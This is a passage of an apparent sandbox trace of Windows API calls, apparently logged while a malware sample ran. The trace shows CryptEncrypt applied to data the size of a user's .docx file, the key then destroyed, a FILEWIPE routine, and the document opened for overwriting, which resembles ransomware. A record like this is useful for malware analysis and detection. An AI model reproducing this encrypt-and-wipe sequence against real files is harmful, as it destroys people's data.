wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.997] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.997] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1550b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15510) returned 1 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.998] CharLowerBuffW (in: lpsz="byte[87313]", cchLength=0xb | out: lpsz="byte[87313]") returned 0xb [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.003] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95fa38*, pdwDataLen=0x6ae220*=0x1550b, dwBufLen=0x15510 | out: pbData=0x95fa38*, pdwDataLen=0x6ae220*=0x15510) returned 1 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.006] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.019] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.019] CryptDestroyKey (hKey=0x7c2200) returned 1 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.020] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.020] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.020] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.020] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.021] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.022] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x6ef70c0, ftLastWriteTime.dwHighDateTime=0x1d5a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0x7c2240 [0037.022] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.022] CharLowerBuffW (in: lpsz="byte[87307]", cchLength=0xb | out: lpsz="byte[87307]") returned 0xb [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.022] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.022] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.023] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da2e8 [0037.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da2e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.023] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.023] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.023] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.023] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0037.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x889670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0037.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zldtrs1nh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0037.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab5520 | out: hHeap=0x770000) returned 1 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.026] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: 